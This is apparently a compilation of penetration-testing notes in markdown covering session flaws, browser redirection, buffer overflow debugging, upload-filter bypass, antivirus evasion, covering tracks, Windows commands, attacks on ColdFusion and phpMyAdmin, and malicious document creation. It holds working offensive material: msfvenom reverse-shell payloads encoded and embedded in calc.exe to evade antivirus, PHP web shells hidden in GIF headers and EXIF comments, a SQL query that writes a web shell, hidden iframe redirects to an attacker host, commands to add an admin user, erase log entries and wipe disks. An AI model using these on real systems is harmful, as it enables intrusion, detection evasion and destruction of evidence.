 4 | 
 5 | ### Authentication
 6 | 
 7 | 
 8 | 
 9 | ### Logout management
10 | 
11 | * Log out in one tab but you stay logged in in another tab.
12 | 
13 | * Click on log out and then go back in your browser, if you enter in the session again that is a problem.
14 | 
15 | 
16 | 
17 | ### Session management
18 | 
19 | ##### Session does not die after password reset
20 | 
21 | https://hackerone.com/reports/145430
22 | 
23 | ##### Cookie is usable after session is killed
24 | 
25 | This might be an issue if you save the cookie, and then log out. And then inject the cookie into your request again. If you can enter the session you have an issue. The issue here might be that the cookie is cleared on the client-side but not on the server-side.
26 | 
27 | ##### HttpOnly
28 | 
29 | HttpOnly is a optional flag in the Set-Cookie response header. If the flag is set javascript code is not able to access the cookie. Which might prevent XSS. HttpOnly works if the browser honors that flag of course. But most browsers today do. You can see this behaviour if you open up the devetools in your browser and go to storage and look at the cookies. Then you can do 
30 | 
31 | `console.log(document.cookie)` and it will only print out the cookie that has the HttpOnly flag set to `false`.
32 | 
33 | ##### SecureFlag
34 | 
35 | This is another optional flag for cookies. It is the application server that set it. By setting this flag the browser will not send the cookie unencrypted.
36 | 
37 | ##### Session-ID in URL
38 | 
39 | Session ID:s should never be showed in URLs. The risk is that if you pass the session-id in the URL and then share the link with someone that person might inherit the session. But if you put the session-id in the cookie that risk is avoided.
40 | 
41 | 
42 | 
43 | 
44 | 
45 | 
46 | 
47 | ### Password reset link does not expire
48 | 
49 | 1. You create an account in example.com. You add email a@email.com
50 | 2. Your email account gets hacked.
51 | 3. The hacker figures out you have a user on example.com. The hacker clicks the reset-password-link. But does not use it.
52 | 4. The hacked person figures out that he is hacked and thus goes to example.com to change his password.
53 | 5. The hacker now clicks on the link and manage to reset the password.  
54 | 
55 | The problem here is that the first reset-link should be blocked once the second is sent.
56 | 
57 | #### Relevant bug bounty reports
58 | 
59 | [https://hackerone.com/reports/23579](https://hackerone.com/reports/23579)  
60 | [https://hackerone.com/reports/39203](https://hackerone.com/reports/39203)  
61 | [https://hackerone.com/reports/23921](https://hackerone.com/reports/23921)
62 | 
63 | ### Cookie does not expire
64 | 
65 | An easy way to test this is by using burp-suite.
66 | 
67 | 1. Open burp-suite
68 | 2. Login to a website you want to test
69 | 3. Intercept the request, anyone will do.
70 | 4. Right click on the request in burp-suite and click on "Send to repeater". Now you have saved that request for later. With the current cookie.
71 | 5. Log out from the website
72 | 6. Go to the Repeater-tab in burp and click on "Go".
73 | 7. Verify that you are redirected to the login.
74 | 
75 | #### Relevant reports on hackerone
76 | 
77 | [https://hackerone.com/reports/18503](https://hackerone.com/reports/18503)
78 | 
79 | 


--------------------------------------------------------------------------------
/browser_vulnerabilities.md:
--------------------------------------------------------------------------------
 1 | # Browser vulnerabilities
 2 | 
 3 | We have mostly been looking at vulnerabilities found in sites that let's us either attack the user or the underlying system. But there is also another sort of vulnerability. When the browser itself is vulnerable and can lead to remote code execution.
 4 | 
 5 | And example of this is ms12-036. 
 6 | 
 7 | 
 8 | ## XSS and redirection
 9 | 
10 | Most attacks against browsers is based on social engineering. The idea is that you trick the user to click on a link. That link, or that website, is usually controlled by the attacker in one way or another. It can be a legitimate site that the attacker is using, or it might be the attackers own server.
11 | 
12 | Foe example, if the attacker is able to inject code html or javascript the attacker can redirect the user to load another page.
13 | 
14 | 
15 | One technique is to hide the redirection in a frame, this way the user won't even notice that an external page is being loaded. 
16 | ```
17 | <iframe SRC="http://192.168.1.101/evil-page" height = "0" width ="0"></iframe>
18 | ```
19 | A less subtle technique is by just redirecting the user, with a script like this:
20 | ```
21 | <script>location.href='http://192.168.1.101/evil-page';</script>
22 | ```


--------------------------------------------------------------------------------
/buffer_overflow_bof.md:
--------------------------------------------------------------------------------
 1 | # Buffer overflow (BOF)
 2 | 
 3 | ##Methodology
 4 | 
 5 | 1. Investigate the file
 6 | ```
 7 | file
 8 | strings
 9 | ```
10 | 
11 | 2. Test it out - what does the program do?
12 | 
13 | 3. Look at its functions in GDB
14 | 
15 | ```
16 | info functions
17 | ```
18 | 
19 | 4. Look at the assembly of a function
20 | 
21 | ```
22 | disass main
23 | disass otherfunction
24 | ```
25 | 
26 | 5. Look for the flow of the program. Look for cmp
27 | 
28 | 6. Set up breakpoints with hooks
29 | 
30 | ```
31 | define hook-stop
32 | info registers  ;show the registers
33 | x/24xw $esp  ;show the stack
34 | x/2i $eip  ;show the new two instructions
35 | end
36 | ```
37 | 
38 | 7. Step through the whole program. Or at the breakpoints
39 | 
40 | ```
41 | si ;steps one forward, but follows functions
42 | ni ;does not follow functions
43 | ```


--------------------------------------------------------------------------------
/bypass_image_upload.md:
--------------------------------------------------------------------------------
 1 | # Bypass File Upload Filtering
 2 | 
 3 | One common way to gain a shell is actually not really a vulnerability, but a feature! Often times it is possible to upload files to the webserver. This can be abused byt just uploading a reverse shell. The ability to upload shells are often hindered by filters that try to filter out files that could potentially be malicious. So that is what we have to bypass.
 4 | 
 5 | ## Rename it
 6 | 
 7 | We can rename our shell and upload it as shell.php.jpg. It passed the filter and the file is executed as php.
 8 | 
 9 | **php**
10 | phtml, .php, .php3, .php4, .php5, and .inc
11 | 
12 | **asp**
13 | asp, .aspx
14 | 
15 | **perl**
16 | .pl, .pm, .cgi, .lib
17 | 
18 | **jsp**
19 | .jsp, .jspx, .jsw, .jsv, and .jspf
20 | 
21 | **Coldfusion**
22 | .cfm, .cfml, .cfc, .dbm
23 | 
24 | ## GIF89a;
25 | If they check the content.
26 | Basically you just add the text "GIF89a;" before you shell-code. So it would look something like this:
27 | 
28 | ```
29 | GIF89a;
30 | <?
31 | system($_GET['cmd']);//or you can insert your complete shell code
32 | ?>
33 | ```
34 | 
35 | ## In image
36 | ```
37 | exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg
38 | ```
39 | 
40 | Exiftool is a great tool to view and manipulate exif-data.
41 | Then I had to rename the file
42 | 
43 | mv lo.jpg lo.php.jpg
44 | 
45 | ## Nullbyte
46 | 
47 | 
48 | ## References
49 | 
50 | http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html
51 | 
52 | https://www.owasp.org/index.php/Unrestricted_File_Upload
53 | http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Webshells%20In%20PHP,%20ASP,%20JSP,%20Perl,%20And%20ColdFusion.pdf


--------------------------------------------------------------------------------
/bypassing_antivirus.md:
--------------------------------------------------------------------------------
 1 | # Bypassing antivirus
 2 | 
 3 | So first of all, what is a antivirus program and how does it work?
 4 | 
 5 | ## How does it work?
 6 | 
 7 | Antivirus normally uses blacklisting as their methodology. They have a huge database full of signatures for different known malware. Then the antivirus just scans the disk and search for any of those signatures. 
 8 | 
 9 | ## How do we bypass it?
10 | 
11 | So since there are many different antivirus and they all have different databases of signatures it is important for us to know what antivirus our target uses. Once we know that we can use virtustotal.com to upload our malicious files to see if that specific antivirus finds it. 
12 | 
13 | So what we need to do is to change the malware enough so that the signature changes and the antivirus is not able to identify the file as malicious.
14 | 
15 | There are a few different techniques for doing this.
16 | 
17 | ### Encoding
18 | 
19 | We can encode our malware in different ways. This can be done with msfvenom. Notice how we set the `-e` flag here, and then use the `shikata_ga_nai` encoding. This is not that effective since antivirus-vendors have access to metasploit as well.
20 | 
21 | ```
22 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 -f exe -e
23 | x86/shikata_ga_nai -i 9 -o meterpreter_encoded.exe
24 | ```
25 | 
26 | ### Embed in non-malicious file
27 | 
28 | Another way is to embed our payload in a non-malicious file.
29 | 
30 | ```
31 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 -f exe -e
32 | x86/shikata_ga_nai -i 9 -x calc.exe -o
33 | bad_calc.exe
34 | ```
35 | 
36 | ### Encrypting the malware
37 | 
38 | In order to obfuscate our malware we can encrypt it, and thus radically changing the signature. One much mentioned tool for doing that is Hyperion. It is a windows binary but we can compile and run it from linux as well. This worked for me (october 2016)
39 | 
40 | ```
41 | wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip
42 | unzip Hyperion-1.2.zip
43 | i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe
44 | ```
45 | 
46 | In Kali you have hyperion 1 included. However for it to work you have to run it from it's correct path. So go to `/usr/share/veil-evasion/tools/hyperion`
47 | 
48 | And run it like this
49 | 
50 | ```
51 | wine hyperion /path/to/file.exe encryptedfile.exe
52 | ```
53 | 


--------------------------------------------------------------------------------
/clean_up.md:
--------------------------------------------------------------------------------
 1 | # Cover your tracks
 2 | 
 3 | http://www.dankalia.com/tutor/01005/0100501003.htm
 4 | 
 5 | ## On Linux
 6 | 
 7 | 
 8 | ### Log files
 9 | 
10 | 
11 | `/etc/syslog.conf`
12 | 
13 | In this file you can read all the logs that syslog log. 
14 | 
15 | 
16 | On linux systems a lot of logs are stored in:
17 | 
18 | 
19 | ```
20 | /var/logs
21 | ```
22 | 
23 | For example:
24 | ```
25 | /var/log/messages
26 | ```
27 | 
28 | Here you have failed and successful login attempts. SSH, SUDO, and much more.
29 | 
30 | ```
31 | /var/log/auth.log
32 | ```
33 | 
34 | ### Apache
35 | 
36 | ```
37 | /var/log/apache2/access.log
38 | /var/log/apache2/error.log
39 | ```
40 | 
41 | Remove your own ip like this
42 | 
43 | ```
44 | grep -v '<src-ip-address>' /path/to/access_log > a && mv a /path/to/access_log
45 | ```
46 | 
47 | What it does is simply to copy all lines except the lines that contain your IP-address. And then move them, and them move them back again.
48 | 
49 | ```
50 | grep -v <entry-to-remove> <logfile> > /tmp/a ; mv /tmp/a <logfile> ; rm -f /tmp/a
51 | ```
52 | 
53 | ### UTMP and WTMP
54 | 
55 | These logs are not stored in plaintext but instead as binaries. Which makes it a bit harder to clear.
56 | 
57 | ```
58 | who
59 | ```
60 | 
61 | ```
62 | last
63 | ```
64 | 
65 | ```
66 | lastlog
67 | ```
68 | 
69 | ### Command history
70 | 
71 | All your commands are also stored.
72 | 
73 | ```
74 | echo $HISTFILE
75 | echo $HISTSIZE
76 | ```
77 | 
78 | You can set your file-size like this to zero, to avoid storing commands.
79 | 
80 | ```
81 | export HISTSIZE=0
82 | ```
83 | 
84 | If you set it when you get shell you won't have to worry about cleaning up the history.
85 | 
86 | ## Shred files
87 | 
88 | Shredding files lets you remove files in a more secure way.
89 | 
90 | ```
91 | shred -zu filename
92 | ```
93 | 
94 | ## On windows
95 | 
96 | Clear env
97 | https://www.offensive-security.com/metasploit-unleashed/event-log-management/


--------------------------------------------------------------------------------
/clickjacking.md:
--------------------------------------------------------------------------------
1 | # Clickjacking
2 | 
3 | 
4 | 
5 | # References
6 | 
7 | HackerOne issues
8 | https://hackerone.com/reports/109373


--------------------------------------------------------------------------------
/cmd.md:
--------------------------------------------------------------------------------
  1 | # CMD - Windows commands
  2 | 
  3 | 
  4 | The equivalent to the Linux command `;` as in
  5 | 
  6 | ```
  7 | echo "command 1" ; echo "command 2"
  8 | ```
  9 | 
 10 | is
 11 | 
 12 | ```
 13 | dir & whoami
 14 | ```
 15 | 
 16 | ### Dealing with files and stuff
 17 | 
 18 | **Delete file**
 19 | 
 20 | ```
 21 | del
 22 | ```
 23 | 
 24 | **Create folder/directory**
 25 | 
 26 | ```
 27 | md folderName
 28 | ```
 29 | 
 30 | **Show hidden files**
 31 | 
 32 | ```
 33 | dir /A
 34 | ```
 35 | 
 36 | **Print out file content, like cat**
 37 | 
 38 | ```
 39 | type file.txt
 40 | ```
 41 | 
 42 | **grep files**
 43 | 
 44 | ```
 45 | findstr file.txt
 46 | ```
 47 | 
 48 | 
 49 | 
 50 | ### Network
 51 | 
 52 | **Show network information**
 53 | 
 54 | `netstat -an`
 55 | 
 56 | **Show network adapter info**
 57 | 
 58 | `ipconfig`
 59 | 
 60 | **Ping another machine** 
 61 | 
 62 | `ping 192.168.1.101` 
 63 | 
 64 | **Traceroute**
 65 | 
 66 | `tracert`
 67 | 
 68 | 
 69 | ### Processes
 70 | 
 71 | **List processes**
 72 | 
 73 | `tasklist`
 74 | 
 75 | **Kill a process**
 76 | 
 77 | `taskkill /PID 1532 /F`
 78 | 
 79 | ### Users
 80 | 
 81 | ```
 82 | net users
 83 | 
 84 | # Add user
 85 | net user hacker my_password /add
 86 | net localgroup Administrator hacker /add
 87 | 
 88 | # Check if you are part of a domain
 89 | net localgroup /domain
 90 | 
 91 | # List all users in a domain
 92 | net users /domain
 93 | ```
 94 | 
 95 | ### Other
 96 | 
 97 | **Shutdown**
 98 | 
 99 | ```
100 |  # Shutdown now
101 |  shutdown /s /t 0
102 |  
103 |  # Restart
104 |  shutdown /r /t 0
105 |  ```
106 |  
107 |  **ciper - Clear data/shred**
108 |  
109 |  ```
110 |  Shreds the whole machine
111 |  ciper /w:C:\
112 |  ```
113 |  
114 | **Show environmental variables**
115 | 
116 | ```
117 | set
118 | ```
119 | 
120 | **Show options for commands**
121 | 
122 | The "man"-pages in windows is simply:
123 | ```
124 | help dir
125 | ```
126 | 
127 | ### Mounting - Mapping
128 | 
129 | In the windows world mounting is called mapping.
130 | 
131 | If you want to see which drives are mapped/mounted to your file-system you can use any of these commands:
132 | 
133 | ```
134 | # This is the most thorough
135 | wmic logicaldisk get deviceid, volumename, description
136 | 
137 | # But this works too
138 | wmic logicaldisk get name
139 | wmic logicaldisk get caption
140 | 
141 | # This can be slow. So don't kill your shell!
142 | fsutil fsinfo drives
143 | 
144 | # With powershell
145 | get-psdrive -psprovider filesystem
146 | 
147 | # This works too, but it is interacive. So it might be dangerous work hackers
148 | diskpart
149 | list volume
150 | 
151 | # Map only network drives
152 | net use
153 | ```
154 | 
155 | The command to deal with mounting/mapping is **net use**
156 | 
157 | Using `net use` we can connect to other shared folder, on other systems. Many windows machines have a default-share called IPC (Interprocess communication share). It does not contain any files. But we can usually connect to it without authentication. This is called a **null-session**. Although the share does not contain any files it contains a lot of data that is useful for enumeration.
158 | The Linux-equivalent of `net use` is usually `smbclient`. 
159 | 
160 | 
161 | ```
162 | net use \\IP address\IPC$ "" /u:""
163 | net use \\192.168.1.101\IPC$ "" /u:""
164 | ```
165 | 
166 | If you want to map a drive from another network to your filesystem you can do that like this:
167 | 
168 | ```
169 | # This will map it to drive z
170 | net use z: \\192.168.1.101\SYSVOL
171 | 
172 | # This will map it to the first available drive-letter
173 | net use * \\192.168.1.101\SYSVOL
174 | ```
175 | 
176 | Here you map the drive to the letter `z`. If the command is successful you should now be able to access those files by entering the `z` drive.
177 | 
178 | You enter the z-drive by doing this:
179 | 
180 | ```
181 | C:\>z:
182 | Z:\
183 | 
184 | # Now we switch back to c
185 | Z:\>c:
186 | C:\
187 | ```
188 | 
189 | ** Remove a network drive - umount it**
190 | 
191 | First leave the drive if you are in it:
192 | 
193 | ```
194 | c:
195 | net use z: /del
196 | ```
197 | 
198 | 
199 | # References and Stuff
200 | 
201 | This might come in handy for the linux-users: http://www.lemoda.net/windows/windows2unix/windows2unix.html
202 | 
203 | 
204 | 


--------------------------------------------------------------------------------
/commands.md:
--------------------------------------------------------------------------------
 1 | # Commands
 2 | 
 3 | You can find all the commands in for metasploit here:
 4 | 
 5 | https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
 6 | 
 7 | I just want to highlight some really useful commands.
 8 | 
 9 | ## setg
10 | With `setg` you can set global variables. Like instead of having to enter `set LHOST 192.168.1.101` for every payload and listener with `setg` those will be automatically filled in with your global values. You can enter `save` to save the global values so they persist from one session to the other.
11 | 
12 | ## Populate RHOSTS from database
13 | 
14 | This is an incredibly useful feature. 
15 | 
16 | First you choose the auxilary module. Then yo just do
17 | 
18 | ```
19 | services -p 139 --rhosts
20 | run
21 | ```


--------------------------------------------------------------------------------
/common_web-services.md:
--------------------------------------------------------------------------------
  1 | # Common web-services
  2 | 
  3 | This is a list of some common web-services. The list is alphabetical.
  4 | 
  5 | ## Cold Fusion
  6 | 
  7 | If you have found a cold fusion you are almost certainly struck gold.
  8 | http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
  9 | 
 10 | ### Determine version
 11 | 
 12 | example.com/CFIDE/adminapi/base.cfc?wsdl
 13 | It will say something like:
 14 | ```
 15 | <!--WSDL created by ColdFusion version 8,0,0,176276-->
 16 | ```
 17 | 
 18 | ### Version 8
 19 | 
 20 | #### FCKEDITOR
 21 | 
 22 | 
 23 | This works for version 8.0.1. So make sure to check the exact version.
 24 | 
 25 | ```
 26 | use exploit/windows/http/coldfusion_fckeditor
 27 | ```
 28 | 
 29 | #### LFI
 30 | 
 31 | This will output the hash of the password. 
 32 | 
 33 | ```
 34 | http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
 35 | ```
 36 | 
 37 | You can pass the hash.
 38 | 
 39 | http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
 40 | 
 41 | http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 42 | 
 43 | neo-security.xml and password.properties
 44 | 
 45 | ## Drupal
 46 | 
 47 | ## Elastix
 48 | 
 49 | Full of vulnerabilities. The old versions at least.
 50 | 
 51 | http://example.com/vtigercrm/
 52 | default login is
 53 | `admin:admin`
 54 | 
 55 | You might be able to upload shell in profile-photo.
 56 | 
 57 | ## Joomla
 58 | 
 59 | ## Phpmyadmin
 60 | 
 61 | Default credentials
 62 | 
 63 | ```
 64 | root <blank>
 65 | pma <blank>
 66 | ```
 67 | 
 68 | If you find a phpMyAdmin part of a site that does not have any authentication, or you have managed to bypass the authetication you can use it to upload a shell.
 69 | 
 70 | You go to:
 71 | ```
 72 | http://192.168.1.101/phpmyadmin/
 73 | ```
 74 | 
 75 | Then click on SQL. 
 76 | 
 77 | ```
 78 | Run SQL query/queries on server "localhost":
 79 | ```
 80 | From here we can just run a sql-query that creates a php script that works as a shell
 81 | 
 82 | So we add the following query:
 83 | 
 84 | ```
 85 | SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"
 86 | 
 87 | # For linux
 88 | SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
 89 | ```
 90 | 
 91 | The query is pretty self-explanatory. Now you just visit `192.168.1.101/shell.php?cmd=ipconfig` and you have a working web-shell.
 92 | We can of course just write a superlong query with a better shell. But sometimes it is easier to just upload a simple web-shell, and from there download a better shell.
 93 | 
 94 | ### Download a better shell
 95 | 
 96 | On linux-machines we can use wget to download a more powerful shell.
 97 | 
 98 | ```
 99 | ?cmd=wget%20192.168.1.102/shell.php
100 | ```
101 | 
102 | On windows-machines we can use tftp. 
103 | 
104 | ## Webdav
105 | 
106 | Okay so webdav is old as hell, and not used very often. It is pretty much like ftp. But you go through http to access it. So if you have webdav installed on a xamp-server you can access it like this:
107 | 
108 | ```
109 | cadaver 192.168.1.101/webdav
110 | ```
111 | 
112 | Then sign in with username and password.
113 | The default username and passwords on xamp are:
114 | 
115 | Username: **wampp**
116 | 
117 | Password: **xampp**
118 | 
119 | Then use **put** and **get** to upload and download. With this you can of course upload a shell that gives you better access.
120 | 
121 | If you are looking for live examples just google this:
122 | 
123 | ```
124 | inurl:webdav site:com
125 | ```
126 | 
127 | 
128 | Test if it is possible to upload and execute files with webdav.
129 | 
130 | ```
131 | davtest -url http://192.168.1.101 -directory demo_dir -rand aaaa_upfileP0C
132 | ```
133 | 
134 | If you managed to gain access but is unable to execute code there is a workaround for that!
135 | So if webdav has prohibited the user to upload .asp code, and pl and whatever, we can do this:
136 | 
137 | upload a file called shell443.txt, which of course is you .asp shell. And then you rename it to **shell443.asp;.jpg**. Now you visit the page in the browser and the asp code will run and return your shell. 
138 | 
139 | ### References
140 | 
141 | http://secureyes.net/nw/assets/Bypassing-IIS-6-Access-Restrictions.pdf
142 | 
143 | ## Webmin
144 | 
145 | Webmin is a webgui to interact with the machine.
146 | 
147 | The password to enter is the same as the passsword for the root user, and other users if they have that right. There are several vulnerabilites for it. It is run on port 10000.
148 | 
149 | 
150 | ## Wordpress
151 | 
152 | 
153 | ```
154 | sudo wpscan -u http://cybear32c.lab
155 | ```
156 | 
157 | If you hit a 403. That is, the request if forbidden for some reason.
158 | Read more here: https://en.wikipedia.org/wiki/HTTP_403
159 | 
160 | It could mean that the server is suspicious because you don't have a proper user-agent in your request, in wpscan you can solve this by inserting --random-agent.
161 | You can of course also define a specific agent if you want that. But random-agent is pretty convenient.
162 | ```
163 | sudo wpscan -u http://cybear32c.lab/ --random-agent
164 | ```
165 | 
166 | ### Scan for users
167 | 
168 | You can use wpscan to enumerat users:


--------------------------------------------------------------------------------
/compiling-windows-exploits.md:
--------------------------------------------------------------------------------
 1 | Compiling exploits for windows on Linux can be a bit of a hassle.
 2 | 
 3 | 
 4 | 
 5 | ```
 6 | i686-w64-mingw32-gcc exploit.c -o exploit
 7 | ```
 8 | 
 9 | For 32bit
10 | 
11 | ```
12 | i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32
13 | ```
14 | 
15 | 


--------------------------------------------------------------------------------
/connections.md:
--------------------------------------------------------------------------------
  1 | # Useful Scripts
  2 | 
  3 | 
  4 | ## Make Request
  5 | 
  6 | Sometimes we might want to make a request to a website programmatically. Instead of having to visit the page in the browser. In Python we can to it the following way.
  7 | 
  8 | If you don't have the module requests installed you can install it like this.
  9 | 
 10 | `pip install requests`
 11 | 
 12 | ```python
 13 | import requests
 14 | 
 15 | req = requests.get("http://site.com")
 16 | print req.status_code
 17 | print req.text
 18 | ```
 19 | 
 20 | ### Custom headers
 21 | 
 22 | We might receive a `403` error if we don't include a user-agent. Or we might want to send a specific header. We can do that the following way.
 23 | 
 24 | ```python
 25 | import requests
 26 | 
 27 | headers = {
 28 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
 29 | "Accept-Encoding": "gzip, deflate, sdch",
 30 | "Accept-Language": "en-US,en;q=0.8,es;q=0.6,sv;q=0.4",
 31 | "Cache-Control": "max-age=0",
 32 | "Connection": "keep-alive",
 33 | "Cookie": "_gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1",
 34 | "Host": "docs.python-requests.org",
 35 | "If-Modified-Since": "Wed, 03 Aug 2016 20:05:34 GMT",
 36 | "If-None-Match": 'W/"57a24e8e-e1f3"',
 37 | "Referer": "https://www.google.com/",
 38 | "Upgrade-Insecure-Requests": "1",
 39 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36"
 40 | }
 41 | 
 42 | req = requests.get("http://site.com", headers=headers)
 43 | print req.status_code
 44 | print req.text
 45 | ```
 46 | 
 47 | If you need to add an action, like loggin in or something like that, to your request you do the following:
 48 | 
 49 | ```python
 50 | values = {'action' : 'whatever'}
 51 | req = requests.get("http://site.com", data=values, headers=headers)
 52 | ```
 53 | 
 54 | Here is the documentation
 55 | http://docs.python-requests.org/en/master/user/quickstart/
 56 | 
 57 | ## Read and write to files
 58 | 
 59 | Many times we want to read through files and do stuff do it. This can of course be done using bash but we can also do it in python. It might be easier to parse text in python.
 60 | 
 61 | ```python
 62 | file_open = open("readme.txt", "r")
 63 | for line in file_open:
 64 |     print line.strip("\n")
 65 |     if line.strip("\n") == "rad 4":
 66 |         print "last line"
 67 | ```
 68 | 
 69 | 
 70 | ## Basic banner-grabber
 71 | 
 72 | Here is an example of the most basic usage of the socket module. It connects to a port and prints out the response.
 73 | 
 74 | ```python
 75 | #!/user/bin/env python
 76 | 
 77 | # Importing the socket module
 78 | import socket
 79 | 
 80 | # We use the socker() method of the module socket and store it in the variable s.
 81 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 82 | 
 83 | # Here we use the connect method of the socket we created. The two arguments are pretty self-explanatory
 84 | # The first is the adress the second is the port.
 85 | s.connect(("192.168.1.104", 22))
 86 | 
 87 | # Here we save what the socket reviewed in the variable answer.
 88 | answer = s.recv(1024)
 89 | print answer
 90 | 
 91 | # Send stuff. REMEMBER THE \r\n
 92 | 
 93 | s.send("this is my message\r\n")
 94 | print s.recv(1024)
 95 | 
 96 | # Here we close the socket.
 97 | s.close
 98 | 
 99 | 
100 | ```
101 | 
102 | If you need to check all 65535 ports this might take some time. If a packet is sent and recieved that makes it 65535 seconds, it translates into about 18 hours. So to solve that we can run the a function in new threads.
103 | 
104 | ```python
105 | from multiprocessing.dummy import Pool as ThreadPool
106 | pool = ThreadPool(300)
107 | results = pool.map(function, array)
108 | ```
109 | 
110 | Read more about parallellism here: http://chriskiehl.com/article/parallelism-in-one-line/
111 | 
112 | ## Connecting to SMTP
113 | 
114 | A crappy script to connect to a smtp-server and if you are allowed to test for users with VRFY it goes ahead and test for the users that you input from a file.
115 | One very important thing to note here, that had me stuck for quite a while is that you need to send the query strings in raw-format
116 | 
117 | The `\r` here is fundamental!!
118 | 
119 | ```
120 | s.send('VRFY root \r\n')
121 | ```
122 | 
123 | 
124 | ```python
125 | #!/usr/bin/python
126 | import socket
127 | import sys
128 | import time
129 | import re
130 | 
131 | ips = [
132 | "192.168.1.22",
133 | "192.168.1.72"
134 | ]
135 | 
136 | users = ["root"]
137 | 
138 | userfile = open("/fileWithUsernames.txt", "r")
139 | for line in userfile:
140 |     user = line.strip("\n")
141 |     users.append(user)
142 | 
143 | 
144 | for ip in ips:
145 | 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
146 | 	s.connect((ip, 25))
147 | 	banner = s.recv(1024)
148 | 
149 | 	print "****************************"
150 | 	print "Report for " + ip
151 | 	print banner
152 | 	s.send('VRFY root \r\n')
153 | 	answerUsername = s.recv(1024)
154 | 	answerAsArray = answerUsername.split(" ")
155 | 
156 | 	if answerAsArray[0] == "502":
157 | 		print "VRFY failed"
158 | 	if answerAsArray[0] == "250":
159 | 		print "VRFY command succeeded.\nProceeding to test usernames"
160 | 		
161 | 		for username in users:
162 | 			time.sleep(5)
163 | 			s.send("VRFY " + username + "\r\n")
164 | 
165 | 			answerUsername = s.recv(1024)
166 | 			answerUsernameArray = answerUsername.split(" ")
167 | 			print answerUsernameArray[0]
168 | 			if answerUsernameArray[0] == "250":
169 | 				print "Exists: " + username.strip("\n") 
170 | 			else :
171 | 				print "Does NOT exist: " + username.strip("\n")
172 | 	if answerAsArray[0] == "252":
173 | 		print "FAILED - Cannot verify user"
174 | 	else:
175 | 		"Some other error or whatever here it is: \n" + answerUsername
176 | 
177 | 
178 | 
179 | 	s.close()
180 | ```
181 | 
182 | ## Client/Server using sockets
183 | 
184 | http://programmers.stackexchange.com/questions/171734/difference-between-a-socket-and-a-port


--------------------------------------------------------------------------------
/create_shellcode.md:
--------------------------------------------------------------------------------
 1 | # Generate shellcode
 2 | 
 3 | An easy way to generate shellcode is by using `msfvenom` or `msconsole`. I mostly see people recommending msfvenom online, but I think msfconsole can be a bit easier to work with. But of course it is the same thing, just different interfaces.
 4 | 
 5 | ## Msfconsole
 6 | 
 7 | In msfconsole you have the keyword `generate` that help us generate shellcode. So first we have to select a payload.
 8 | 
 9 | ```
10 | use payload/windows/shell_reverse_tcp
11 | ```
12 | 
13 | Now we set the variables as usual
14 | 
15 | ```
16 | set LPORT 5555
17 | set LHOST 192.168.0.101
18 | ```
19 | 
20 | Now we genereate the shellcode using the command `generate`.
21 | 
22 | To see the options use `generate -h`
23 | 
24 | ## Single commands in windows
25 | 
26 | If you don't have space and only want to execute a single command you can use
27 | 
28 | ```
29 | use payload/windows/exec
30 | 
31 | use payload/cmd/windows/generic
32 | ```
33 | 
34 | 


--------------------------------------------------------------------------------
/creating_malicious_files.md:
--------------------------------------------------------------------------------
 1 | # Creating malicious files
 2 | 
 3 | Not all exploits in msf is connecting to your target. Sometimes metasploit can create the exploit and then you need to get the target to click on it.
 4 | 
 5 | This of course require your target to have some vulnerability usually.
 6 | 
 7 | If your target for example uses an old version of Adobe Acrobat we can create a exploit for that.
 8 | 
 9 | ```
10 | use exploit/windows/fileformat/adobe_utilprintf
11 | 
12 | show options
13 | 
14 | set payload windows/meterpreter/reverse_tcp
15 | exploit
16 | ```
17 | 
18 | So what we are doing here is first select the exploit, then we select what payload we want to have in that exploit. In this case we chose a reverse_tcp-shell.
19 | 
20 | Now we need to set up a handler to recieve the connect-back.
21 | 
22 | ```
23 | use expoit/multi/handler
24 | set LHOST 192.168.1.102
25 | set LPORT 4444
26 | exploit
27 | ```
28 | 
29 | There, now we are up listening for the connect-back when the users clicks on the file.
30 | We can look at the advances options to make sure that the listener is not exiting when you recieve a connect-back. So that you can keep listening for more connect-backs. 
31 | 


--------------------------------------------------------------------------------
/cross-site-scripting.md:
--------------------------------------------------------------------------------
  1 | # Cross-site-scripting
  2 | 
  3 | 
  4 | Cross-site-scripting, or XSS as it is sometimes abbreviated to, is an attack that let's the attacker execute javascript code in the browser of the victim.
  5 | 
  6 | ## So, what's the worst that can happen?
  7 | 
  8 | The attacker is probably not that interested in changing the color or font of the website the victim is visiting. Although s/he could do that. The worst that can happen is probably the following:
  9 | 
 10 | 1. Complete control over the browser
 11 | The attacker can access plugins. Like password managers. The attacker can trick the user into allowing webcam or audio. 
 12 | 
 13 | 2. Session-hijacking/Cookie theft
 14 | This is when the attacker steals the cookie that is saved in the browser. Using this cookie the attacker can log in to the service as the victim, and thereby gain access to his/her account. If the victim is an admin that has extended privileges (uploading code, images, or whatever) this could lead to a compromise of the server itself.
 15 | 
 16 | 3. Keylogger
 17 | The attacker can execute a keylogging-script that steals everything the user inputs in the website. This could be used to steal sensitive information, like passwords, credit cards information, chatlogs or whatever the user inputs.
 18 | 
 19 | 4. Phishing
